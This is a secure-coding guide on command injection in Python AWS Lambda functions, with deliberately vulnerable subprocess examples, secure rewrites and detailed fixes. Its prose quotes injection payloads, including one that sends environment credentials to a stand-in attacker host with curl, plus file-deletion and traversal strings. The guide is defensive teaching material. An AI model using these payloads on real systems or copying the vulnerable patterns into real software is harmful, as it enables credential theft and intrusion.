Python AWS Lambda Dangerous Subprocess Usage

Critical Risk: Command Injection
python, aws-lambda, subprocess, command-injection, serverless, code-execution

What it is

An AWS Lambda function that uses the subprocess module to execute system commands with user-controlled input is open to command injection. In a serverless environment, this can allow attackers to execute arbitrary commands, read AWS credentials from the environment or metadata endpoints, or compromise the Lambda execution environment.

```python
# Vulnerable: Dangerous subprocess usage in Lambda
import subprocess
import os
import json

def lambda_handler(event, context):
    # Dangerous: Direct user input in subprocess
    filename = event.get('filename', '')

    # Extremely dangerous: Command injection possible
    result = subprocess.run(f"ls -la {filename}", shell=True,
                            capture_output=True, text=True)

    return {
        'statusCode': 200,
        'body': json.dumps({
            'output': result.stdout,
            'error': result.stderr
        })
    }

# Another vulnerable pattern
def process_file(event, context):
    file_path = event['file_path']
    command = event.get('command', 'cat')

    # Dangerous: User controls both command and arguments
    cmd = f"{command} {file_path}"
    try:
        output = subprocess.check_output(cmd, shell=True, text=True)
        return {'result': output}
    except subprocess.CalledProcessError as e:
        return {'error': str(e)}

# Converting files with user input
def convert_document(event, context):
    input_file = event['input_file']
    output_format = event['output_format']

    # Dangerous: Potential command injection
    convert_cmd = f"pandoc {input_file} -t {output_format}"
    os.system(convert_cmd)  # Very dangerous
    return {'status': 'converted'}
```
```python
# Secure: Safe alternatives to subprocess in Lambda
import subprocess
import json
import os
import re
import boto3
from botocore.exceptions import ClientError

# Use AWS services instead of shell commands
def lambda_handler(event, context):
    filename = event.get('filename', '')

    # Validate filename
    if not is_safe_filename(filename):
        return {
            'statusCode': 400,
            'body': json.dumps({'error': 'Invalid filename'})
        }

    # Secure: Use the AWS S3 API instead of shell commands
    s3_client = boto3.client('s3')
    bucket_name = os.environ['BUCKET_NAME']

    try:
        # List objects with prefix (safe S3 operation)
        response = s3_client.list_objects_v2(
            Bucket=bucket_name,
            Prefix=filename
        )
        files = [obj['Key'] for obj in response.get('Contents', [])]
        return {
            'statusCode': 200,
            'body': json.dumps({'files': files})
        }
    except Exception:
        return {
            'statusCode': 500,
            'body': json.dumps({'error': 'Failed to list files'})
        }

def is_safe_filename(filename):
    # Validate filename format
    if not filename or len(filename) > 255:
        return False
    # Only allow alphanumeric characters, dots, hyphens, underscores
    if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
        return False
    # Prevent directory traversal
    if '..' in filename or filename.startswith('/'):
        return False
    return True

# Secure file processing with validation
def process_file_secure(event, context):
    file_key = event.get('file_key', '')
    operation = event.get('operation', '')

    # Validate inputs
    if not is_safe_filename(file_key):
        return {'error': 'Invalid file key'}

    allowed_operations = ['read', 'metadata', 'exists']
    if operation not in allowed_operations:
        return {'error': 'Operation not allowed'}

    # Use AWS services instead of subprocess
    s3_client = boto3.client('s3')
    bucket_name = os.environ['BUCKET_NAME']

    try:
        if operation == 'read':
            response = s3_client.get_object(Bucket=bucket_name, Key=file_key)
            content = response['Body'].read().decode('utf-8')
            return {'content': content[:1000]}  # Limit output
        elif operation == 'metadata':
            response = s3_client.head_object(Bucket=bucket_name, Key=file_key)
            return {
                'size': response['ContentLength'],
                'last_modified': response['LastModified'].isoformat(),
                'content_type': response.get('ContentType', 'unknown')
            }
        elif operation == 'exists':
            try:
                s3_client.head_object(Bucket=bucket_name, Key=file_key)
                return {'exists': True}
            # head_object raises ClientError (404), not NoSuchKey
            except ClientError:
                return {'exists': False}
    except Exception:
        return {'error': 'Operation failed'}

# When subprocess is absolutely necessary (rare cases)
def secure_subprocess_example(event, context):
    # Validate that subprocess is needed
    if not os.environ.get('ALLOW_SUBPROCESS'):
        return {'error': 'Subprocess not allowed in this environment'}

    command_type = event.get('command_type', '')

    # Use an allowlist of commands
    allowed_commands = {
        'date': ['/bin/date'],
        'whoami': ['/usr/bin/whoami'],
        'pwd': ['/bin/pwd']
    }

    if command_type not in allowed_commands:
        return {'error': 'Command not allowed'}

    try:
        # Secure: Use an argument list, no shell=True
        result = subprocess.run(
            allowed_commands[command_type],
            capture_output=True,
            text=True,
            timeout=5,    # Prevent hanging
            shell=False   # Critical: No shell interpretation
        )
        if result.returncode != 0:
            return {'error': 'Command failed'}
        return {
            'output': result.stdout.strip()[:500]  # Limit output
        }
    except subprocess.TimeoutExpired:
        return {'error': 'Command timeout'}
    except Exception:
        return {'error': 'Command execution failed'}

# Alternative: Use Lambda layers for tools
def process_with_lambda_layer(event, context):
    """
    Instead of using subprocess, install tools in Lambda layers
    and use Python libraries or AWS services.
    """
    file_content = event.get('content', '')

    # Use Python libraries instead of shell commands
    import base64
    import hashlib

    encoded_content = base64.b64encode(file_content.encode()).decode()
    content_hash = hashlib.sha256(file_content.encode()).hexdigest()

    return {
        'encoded': encoded_content,
        'hash': content_hash,
        'length': len(file_content)
    }
```


Why it happens

Lambda functions routinely receive attacker-influenced data from event payloads, API Gateway requests, and service triggers (S3 object keys, SQS message bodies, SNS message attributes), yet developers often treat the serverless execution context as trusted and pass this data straight into subprocess.run(), subprocess.call(), subprocess.Popen(), or os.system(). Combined with shell=True, commands built through string interpolation, and Lambda's ephemeral /tmp filesystem encouraging quick shell-based file manipulation, this creates command injection vectors that let attackers execute arbitrary commands inside the Lambda container, query the metadata service for temporary credentials, and abuse the function's IAM role. The root causes below examine each of these patterns in detail.

Root causes

Using subprocess.call(), subprocess.run(), or os.system() with User Input

AWS Lambda functions invoke subprocess module functions like subprocess.run(), subprocess.call(), subprocess.Popen(), or os.system() with data from Lambda event payloads, API Gateway requests, or other user-controlled sources, creating command injection vulnerabilities in serverless environments. Lambda event handlers that directly embed event parameters into shell commands enable attackers to execute arbitrary commands: subprocess.run(f"ls {event['filename']}", shell=True) allows command injection through the filename parameter. API Gateway integrations that pass query parameters, path parameters, or request bodies to Lambda functions frequently lack validation before these values reach subprocess calls, particularly in REST APIs where developers trust input validation to occur client-side. SQS, SNS, EventBridge, or S3 event triggers can contain attacker-controlled data: S3 object keys, SNS message attributes, or SQS message bodies may include malicious payloads that Lambda functions pass to subprocess without sanitization. Serverless architectures often treat Lambda functions as trusted execution contexts, leading developers to omit input validation under the mistaken assumption that internal AWS services provide trusted data. The stateless nature of Lambda functions encourages developers to use subprocess for file operations, format conversions, or data processing that could be handled by AWS services like S3, Textract, or Lambda layers. Lambda's ephemeral filesystem (/tmp directory) and limited execution environment prompt developers to use shell commands for quick file manipulations, inadvertently introducing command injection vectors.

Constructing Shell Commands with String Concatenation or f-strings

Lambda function code builds shell commands through string concatenation or Python f-strings that embed user-controlled variables directly into command strings without escaping or validation, making command injection trivial for attackers. F-string patterns like f"convert {input_file} -o {output_file}" directly interpolate Lambda event parameters into commands where special shell characters (;, |, &&, $, backticks) enable command chaining: event['input_file'] = 'file.txt; curl attacker.com/exfil?data=$(cat /proc/self/environ)' injects commands to exfiltrate Lambda environment variables containing AWS credentials. String concatenation patterns concatenate command parts without considering injection: cmd = 'ffmpeg -i ' + video_url + ' output.mp4' allows attackers to inject -exec flags, output redirection, or command separators. Template substitution using percent-formatting or str.format() suffers from identical issues: 'grep "{}" {}'.format(pattern, filename) treats special characters in pattern or filename as shell metacharacters. Developers familiar with parameterized SQL queries fail to apply the same principles to shell commands, not recognizing that subprocess requires argument arrays rather than escaped strings to avoid injection. Lambda functions processing file paths from S3 events construct commands assuming object keys are benign filenames, but S3 allows arbitrary key names including shell metacharacters: subprocess.run(f'file {s3_key}', shell=True) is vulnerable when s3_key contains malicious payloads. JSON event parsing that extracts nested properties into variables maintains tainted data through the application logic: filename = event['body']['file']['name'] preserves injection payloads that reach subprocess calls.
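A minimal sketch of the parsing difference (the payload is hypothetical): if a shell string genuinely cannot be avoided, shlex.quote collapses the payload into one literal token, though as noted below, escaping is fragile and an argument list remains the robust fix.

```python
import shlex

# Hypothetical hostile filename arriving in a Lambda event
malicious = "file.txt; cat /proc/self/environ"

# f-string interpolation: ';' splits this into a second shell command
unsafe_cmd = f"ls -la {malicious}"

# shlex.quote wraps the payload so a shell sees exactly one argument
quoted_cmd = f"ls -la {shlex.quote(malicious)}"

# shlex.split models how a POSIX shell tokenizes each string:
# unsafe_cmd yields five tokens, quoted_cmd yields three
```

shlex.split here only models tokenization; it does not execute anything, which is exactly the point of inspecting commands before they reach subprocess.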

Missing Input Validation Before Command Execution

Lambda functions execute subprocess commands without implementing input validation, sanitization, or allowlist checks on event parameters, trusting that upstream API Gateway validators, AWS WAF rules, or client-side validation prevent malicious input from reaching the Lambda execution environment. Developers rely on API Gateway request validation schemas that check data types and required fields but fail to validate content for command injection payloads: a schema requiring a string filename parameter doesn't prevent values like '; rm -rf /tmp/*'. AWS WAF rules configured to block common SQL injection patterns may miss command injection signatures specific to subprocess exploitation, particularly encoded or obfuscated payloads. Lambda functions that process data from internal AWS services (S3, DynamoDB, SQS) often omit validation under the assumption that internal services provide trusted data, ignoring scenarios where attackers control S3 object keys, DynamoDB item attributes, or SQS message bodies through other application entry points. Serverless application developers focus on business logic implementation without security context, lacking awareness of command injection risks particularly in Lambda environments where subprocess seems isolated from traditional web application attack vectors. Inadequate error handling that catches subprocess exceptions without logging input parameters prevents detection of injection attempts, allowing attackers to probe command syntax iteratively. IAM policies and execution roles that grant Lambda functions broad permissions (s3:*, dynamodb:*, ec2:*) compound command injection risks by enabling injected commands to leverage AWS CLI tools present in Lambda runtime environments to access sensitive resources or escalate privileges.

Using shell=True Without Proper Input Sanitization

Lambda function developers invoke subprocess functions with shell=True parameter to simplify command construction or enable shell features like pipes, wildcards, and environment variable expansion, creating command injection vulnerabilities by instructing Python to interpret commands through a shell rather than executing programs directly. The shell=True parameter causes subprocess to invoke /bin/sh -c "command", making the entire command string subject to shell parsing where special characters have semantic meaning: semicolons separate commands, pipes chain processes, backticks or $() execute subshells, && and || provide conditional execution, and > redirects output. Developers use shell=True to construct complex command pipelines: subprocess.run(f'cat {file} | grep {pattern} | wc -l', shell=True) requires shell=True for pipe functionality but makes file and pattern parameters injection vectors. Lambda runtime environments include /bin/sh and common utilities (curl, wget, base64, nc) that attackers leverage through injected commands to exfiltrate data, establish reverse shells, or probe AWS metadata service at 169.254.169.254 to steal temporary credentials. The Python subprocess documentation warns against shell=True with untrusted input, but serverless developers misinterpret Lambda's isolated execution context as providing inherent security, not recognizing that command injection occurs within the Lambda container before any AWS security controls. Shell metacharacter escaping using shlex.quote() or manual escaping is fragile and error-prone: developers often miss escaping all injection points or fail to handle edge cases, while shell=False with argument lists eliminates injection vectors entirely.
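The shell=True difference can be demonstrated harmlessly with echo, so the "injected" command is benign; with shell=True the semicolon triggers a second command, while the argument-list form prints the payload verbatim:

```python
import subprocess

payload = "hello; echo INJECTED"

# shell=True: /bin/sh interprets ';' and executes a second command
with_shell = subprocess.run(f"echo {payload}", shell=True,
                            capture_output=True, text=True)

# shell=False with an argument list: the payload is one literal argument
without_shell = subprocess.run(["echo", payload],
                               capture_output=True, text=True)

# with_shell.stdout    -> "hello\nINJECTED\n"          (injection succeeded)
# without_shell.stdout -> "hello; echo INJECTED\n"     (payload inert)
```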

Processing User-Provided File Paths or Command Arguments Unsafely

Lambda functions accept file paths, command arguments, or executable names from Lambda events and pass them to subprocess without validating format, restricting to safe character sets, or checking for directory traversal and shell metacharacters, enabling both command injection and unintended file access. S3 event notifications trigger Lambda functions with object keys that developers pass directly to subprocess: subprocess.run(['file', event['Records'][0]['s3']['object']['key']], shell=False) seems safe with shell=False but fails if the Lambda function later uses the key in string formatting. API Gateway file upload handlers that receive multipart/form-data filenames pass these names to subprocess for processing, virus scanning, or format detection: user-controlled filenames containing spaces, quotes, or special characters cause unexpected command behavior even without shell=True. Lambda functions implementing image processing, document conversion, or media transcoding receive user-specified output formats, compression levels, or encoding parameters that become subprocess arguments: subprocess.run(['ffmpeg', '-i', input_file, '-f', output_format]) is vulnerable if output_format = 'mp4 -exec malicious_command' injects additional arguments. Directory traversal in file paths combined with subprocess enables attackers to read arbitrary files from Lambda's filesystem: file_path = '../../proc/self/environ' passed to subprocess.run(['cat', file_path]) exposes environment variables containing AWS credentials. Executable names in subprocess calls sourced from user input allow attackers to invoke unintended binaries: subprocess.run([event['tool'], '--version']) enables execution of arbitrary Lambda runtime commands like curl, python, or aws if the tool parameter isn't validated against an allowlist.
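A sketch of both defenses mentioned above, with hypothetical helper names and a hypothetical permitted directory: pathlib containment (Python 3.9+ for is_relative_to) blocks traversal, and the POSIX `--` separator stops a filename like `-L` from being parsed as an option.

```python
from pathlib import Path

SAFE_ROOT = Path("/tmp/uploads")  # hypothetical permitted directory

def resolve_safe_path(user_path: str) -> Path:
    # Resolve '..' segments and symlinks, then verify containment
    candidate = (SAFE_ROOT / user_path).resolve()
    if not candidate.is_relative_to(SAFE_ROOT.resolve()):
        raise ValueError("path escapes the permitted directory")
    return candidate

def build_file_command(user_path: str) -> list:
    safe = resolve_safe_path(user_path)
    # '--' ends option parsing, so names starting with '-' cannot inject flags
    return ["/usr/bin/file", "--", str(safe)]
```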

Fixes

1. Avoid subprocess Calls Entirely in Lambda Functions Whenever Possible

Eliminate subprocess usage from AWS Lambda functions by redesigning application architecture to leverage native AWS services, Python libraries, or Lambda layers that provide required functionality without shell command execution. Replace shell commands for file operations with boto3 S3 operations: instead of subprocess.run(['aws', 's3', 'cp']), use s3_client.download_file(), s3_client.upload_file(), or s3_client.copy_object() for safe, parameterized S3 interactions. For data transformations, use Python libraries rather than command-line tools: replace imagemagick subprocess calls with Pillow (PIL), replace ffmpeg with moviepy or av libraries, replace pandoc with pypandoc that wraps the binary safely. Implement business logic in Python code rather than invoking shell scripts: refactor bash scripts into Python functions that use AWS SDK, avoiding subprocess entirely. For text processing that might use grep, sed, or awk via subprocess, use Python's built-in re module, string methods, or libraries like pandas for structured data processing. When Lambda functions need to interact with external systems, use boto3 to invoke other Lambda functions via lambda_client.invoke(), trigger Step Functions state machines, or publish SNS/SQS messages rather than using curl or wget through subprocess. Leverage AWS managed services for common operations: use AWS Textract instead of OCR subprocess tools, use AWS Transcribe instead of speech-to-text command-line utilities, use AWS Translate instead of subprocess translation tools. Document the rationale whenever subprocess appears necessary and evaluate whether Lambda is the appropriate compute service: consider ECS Fargate or AWS Batch for workloads requiring extensive shell command execution.
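As one concrete instance of replacing a grep pipeline with the re module, a hypothetical helper might look like this; re.escape treats the user's pattern as literal data, so shell metacharacters in it are meaningless:

```python
import re

def count_matching_lines(text: str, pattern: str) -> int:
    """Pure-Python stand-in for a `grep -c <pattern>` subprocess call.
    The pattern is data, never shell syntax."""
    literal = re.escape(pattern)
    return sum(1 for line in text.splitlines() if re.search(literal, line))
```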

2. Use AWS SDK (boto3) and Managed Service APIs Instead of Shell Commands

Replace all shell command invocations with equivalent AWS SDK (boto3) operations or AWS service API calls that provide type-safe, parameterized interfaces immune to command injection vulnerabilities. For S3 operations, use boto3 S3 client methods: list_objects_v2() instead of 'aws s3 ls', get_object() instead of 'aws s3 cp', put_object() instead of file writing with subprocess. For DynamoDB operations, use boto3 DynamoDB resource or client: table.query(), table.scan(), table.put_item() provide safe data access without shell command construction. For Lambda orchestration, use lambda_client.invoke() to call other Lambda functions with JSON payloads: response = lambda_client.invoke(FunctionName='other-function', Payload=json.dumps(event)) safely chains Lambda functions without subprocess. For SQS message processing, use sqs_client.send_message(), receive_message(), and delete_message() instead of AWS CLI subprocess calls. For Systems Manager Parameter Store or Secrets Manager, use ssm_client.get_parameter() or secretsmanager_client.get_secret_value() to retrieve configuration or credentials instead of shell commands that expose values in process lists. For CloudWatch logging and metrics, use boto3 to put_log_events() and put_metric_data() instead of subprocess calls to AWS CLI. For file format detection, use Python libraries: python-magic for MIME type detection instead of 'file' command, PyPDF2 or pdfminer for PDF analysis instead of 'pdfinfo' subprocess. For compression operations, use Python's gzip, zipfile, or tarfile modules instead of subprocess calls to tar, gzip, or unzip commands. Configure boto3 clients with appropriate error handling, retry logic, and timeout settings to ensure reliability without subprocess fallbacks. Set IAM execution role permissions to grant Lambda functions only required AWS service permissions, applying least privilege principles.
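For the compression case above, a hypothetical helper can build an archive entirely in memory with the stdlib zipfile module, removing any need to shell out to zip or tar:

```python
import io
import zipfile

def zip_in_memory(files: dict) -> bytes:
    """Build a zip archive from {name: bytes} in memory,
    replacing subprocess.run(['zip', ...]) with the stdlib."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()
```

The resulting bytes can be uploaded with s3_client.put_object without ever touching the /tmp filesystem.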

3. Validate and Sanitize All Input Before Any subprocess Calls

Implement comprehensive input validation and sanitization for all Lambda event data before it reaches subprocess calls, using allowlists, format validation, character restrictions, and length limits to prevent command injection attacks. Define strict input schemas using JSON Schema and enforce them at Lambda function entry: validate that event parameters match expected types, formats, and value ranges before processing. Use allowlist validation for enumerated inputs: if event['operation'] not in ['read', 'write', 'delete']: raise ValueError('Invalid operation') ensures only permitted operations execute. Apply regular expression validation to restrict input to safe character sets: re.match(r'^[a-zA-Z0-9._-]+$', filename) permits only alphanumeric characters, dots, hyphens, and underscores in filenames, blocking shell metacharacters. Implement length limits on all string inputs to prevent buffer overflow conditions and limit attack payload size: if len(input_string) > 255: raise ValueError('Input too long'). Check for directory traversal patterns: if '..' in file_path or file_path.startswith('/'): raise ValueError('Invalid path') prevents path traversal attacks. Use Path from pathlib to normalize and validate file paths: Path(file_path).resolve().is_relative_to(safe_directory) ensures paths remain within permitted directories. Validate file extensions against allowlists: allowed_extensions = {'.txt', '.json', '.csv'}; if Path(filename).suffix not in allowed_extensions: raise ValueError('Invalid file type'). Sanitize input by removing dangerous characters: sanitized = re.sub(r'[^a-zA-Z0-9]', '', user_input) strips non-alphanumeric characters. Log all validation failures with input samples (truncated and sanitized) to CloudWatch for security monitoring and incident response. Raise exceptions for validation failures rather than proceeding with sanitized values that might be unusable or still dangerous.
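The checks above can be combined into one fail-closed validator; the helper name and extension allowlist here are illustrative:

```python
import re
from pathlib import Path

ALLOWED_EXTENSIONS = {".txt", ".json", ".csv"}  # example allowlist

def validate_filename(filename: str) -> str:
    """Raise ValueError on anything outside a strict safe format."""
    if not filename or len(filename) > 255:
        raise ValueError("filename missing or too long")
    if not re.fullmatch(r"[A-Za-z0-9._-]+", filename):
        raise ValueError("filename contains disallowed characters")
    if ".." in filename:
        raise ValueError("path traversal pattern detected")
    if Path(filename).suffix not in ALLOWED_EXTENSIONS:
        raise ValueError("file type not allowed")
    return filename
```

Raising instead of silently sanitizing follows the guidance above: a rejected request is logged and visible, while a "cleaned" value may still be dangerous or simply wrong.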

4. Use subprocess with shell=False and Argument Lists

When subprocess usage is unavoidable in Lambda functions, always use shell=False (the default) and pass commands as argument lists rather than strings to prevent shell interpretation of metacharacters and eliminate command injection vectors. Structure subprocess calls with argument lists where each argument is a separate list element: subprocess.run(['ls', '-la', directory], shell=False) passes arguments directly to the ls program without shell parsing. Never concatenate strings to build commands: avoid f-strings, str.format(), or + concatenation that embeds user input into command strings. Pass each command component as a distinct list element: subprocess.run([command, arg1, arg2, user_input], shell=False) treats user_input as a literal string argument rather than shell syntax. Even with shell=False, validate that user input cannot inject additional arguments to the invoked command: subprocess.run(['tar', '-czf', archive_name, user_file]) is vulnerable if user_file = '--exclude-from=/dev/null --add-file=/etc/passwd' injects tar arguments. Use absolute paths for executables to prevent PATH manipulation: subprocess.run(['/usr/bin/file', filename]) ensures the correct binary executes rather than a trojan in a user-controlled PATH. Implement timeout parameters to prevent Lambda function timeouts and excessive resource consumption: subprocess.run(command, timeout=5) raises TimeoutExpired if command runs beyond 5 seconds. Capture output safely using capture_output=True or explicit stdout/stderr handling: result = subprocess.run(command, capture_output=True, text=True) captures output for logging without displaying it to users. Never use subprocess.call() or os.system() which are more prone to misuse: prefer subprocess.run() with explicit parameters. Set environment variables explicitly with env parameter rather than inheriting Lambda's environment: subprocess.run(command, env={'PATH': '/usr/bin'}) provides a minimal clean environment.
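A compact sketch tying these rules together, using the Python interpreter itself as a guaranteed-present absolute-path executable; the hostile string is passed through untouched because no shell ever parses it:

```python
import subprocess
import sys

hostile = "$(cat /proc/self/environ); rm -rf /tmp"  # inert as a list element

result = subprocess.run(
    # Absolute interpreter path; every argument is a separate list element
    [sys.executable, "-c", "import sys; print(sys.argv[1])", hostile],
    capture_output=True,
    text=True,
    timeout=5,
    shell=False,                    # the default, stated explicitly
    env={"PATH": "/usr/bin:/bin"},  # minimal environment, not Lambda's
)
# result.stdout contains the hostile string verbatim: nothing executed it
```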

5. Implement Allowlists for Permitted Commands and Arguments

Define and enforce strict allowlists that specify exactly which commands can be executed and what arguments are permitted, validating all subprocess invocations against these allowlists before execution to prevent arbitrary command execution. Create dictionaries mapping operation names to command arrays: ALLOWED_COMMANDS = {'list': ['/bin/ls', '-la'], 'date': ['/bin/date'], 'whoami': ['/usr/bin/whoami']} defines permitted operations with complete command syntax. Validate requested operations against allowlist keys: if operation not in ALLOWED_COMMANDS: raise ValueError(f'Operation {operation} not allowed') rejects unknown operations before subprocess calls. Prohibit user control of executable names: never allow event['command'] to determine which program executes; use predefined command mappings instead. For operations requiring user-provided arguments, validate arguments against allowlists: if file_extension not in ALLOWED_EXTENSIONS: raise ValueError('Invalid file extension') ensures only permitted file types are processed. Implement argument validation functions: validate_safe_path(path), validate_safe_filename(filename), validate_integer_argument(arg) provide reusable validation that checks arguments meet safety requirements. Use argument type conversion to enforce constraints: int(event['count']) ensures count is an integer, raising ValueError for non-numeric input before it reaches subprocess. Create configuration files or environment variables defining allowed commands: load ALLOWED_COMMANDS from SSM Parameter Store or environment variables rather than hardcoding, enabling operational control of permitted operations. Document why each allowed command is necessary and what security risks it presents: maintain a security review log justifying subprocess usage. Implement audit logging that records all subprocess invocations with command, arguments, execution result, and Lambda request ID to CloudWatch for security monitoring and forensics. 
Consider using AWS Lambda function versions and aliases to gradually roll out changes to allowed commands, enabling rapid rollback if security issues emerge.
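A minimal dispatcher sketch along these lines (the allowlist entries are examples; audit logging and configuration loading from SSM are omitted):

```python
import subprocess

# Operation names map to complete, fixed argv lists; callers never
# supply executable names or flags
ALLOWED_COMMANDS = {
    "date": ["/bin/date"],
    "whoami": ["/usr/bin/whoami"],
}

def run_allowed(operation: str) -> str:
    if operation not in ALLOWED_COMMANDS:
        raise ValueError(f"operation {operation!r} not allowed")
    result = subprocess.run(
        ALLOWED_COMMANDS[operation],
        capture_output=True, text=True, timeout=5, shell=False,
    )
    if result.returncode != 0:
        raise RuntimeError("command failed")
    return result.stdout.strip()[:500]  # limit output size
```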

6. Use Lambda Layers for Pre-installed Tools Instead of Dynamic Execution

Package required command-line tools, binaries, and dependencies into AWS Lambda layers that provide pre-compiled, version-controlled executables rather than dynamically constructing and executing commands at runtime with subprocess. Create Lambda layers containing compiled binaries like ImageMagick, FFmpeg, or custom tools: package binaries in layers with proper /opt directory structure, ensuring executables are available in Lambda runtime without subprocess-based installation. Install Python libraries that wrap command-line tools into Lambda layers: include libraries like Pillow, opencv-python, or pandas that provide Python APIs to functionality otherwise requiring shell commands. Use AWS-provided Lambda layers for common tools: AWS publishes layers for libraries and tools that can replace subprocess usage. Configure Lambda function execution to include necessary layers in the function's runtime environment: layers reduce deployment package size and provide shared dependencies across functions. Replace dynamic command construction with library function calls: instead of subprocess.run(['convert', input_img, '-resize', '800x600', output_img]), use Pillow: Image.open(input_img).resize((800, 600)).save(output_img). For tools requiring subprocess invocation, use layers to ensure consistent binary versions and paths: reference layer-provided executables via absolute paths like '/opt/bin/tool' rather than relying on PATH. Implement wrapper functions around layer-provided tools that enforce security constraints: create safe_image_resize(), safe_video_encode() functions that validate inputs, invoke layer tools safely, and handle errors consistently. Version Lambda layers to track tool updates and security patches: create new layer versions when updating binaries, enabling controlled rollout and rollback. Document layer contents, versions, and security considerations in Lambda function documentation and deployment templates. 
Use Infrastructure as Code (CloudFormation, Terraform, SAM) to define layer dependencies declaratively, ensuring consistent layer configuration across environments. Test layer functionality in isolated Lambda functions before deploying to production to verify that layer-provided tools work correctly and don't introduce vulnerabilities.
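A small builder sketch for the wrapper idea above; the tool names are hypothetical layer contents, and /opt/bin reflects the standard layer mount point under /opt:

```python
from pathlib import Path

LAYER_BIN = Path("/opt/bin")  # Lambda layers unpack under /opt

# Hypothetical tools shipped in the layer; anything else is rejected
LAYER_TOOLS = {"pandoc", "ffmpeg"}

def layer_command(tool: str, *args: str) -> list:
    """Build an argv referencing layer binaries by absolute path,
    so PATH manipulation cannot substitute another executable."""
    if tool not in LAYER_TOOLS:
        raise ValueError("tool not provided by the layer")
    return [str(LAYER_BIN / tool), *args]
```

The returned list would then be passed to subprocess.run with shell=False, after the argument-validation steps described in fixes 3 and 4.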

Detect This Vulnerability in Your Code

Sourcery automatically identifies dangerous subprocess usage in Python AWS Lambda functions, along with many other security issues in your codebase.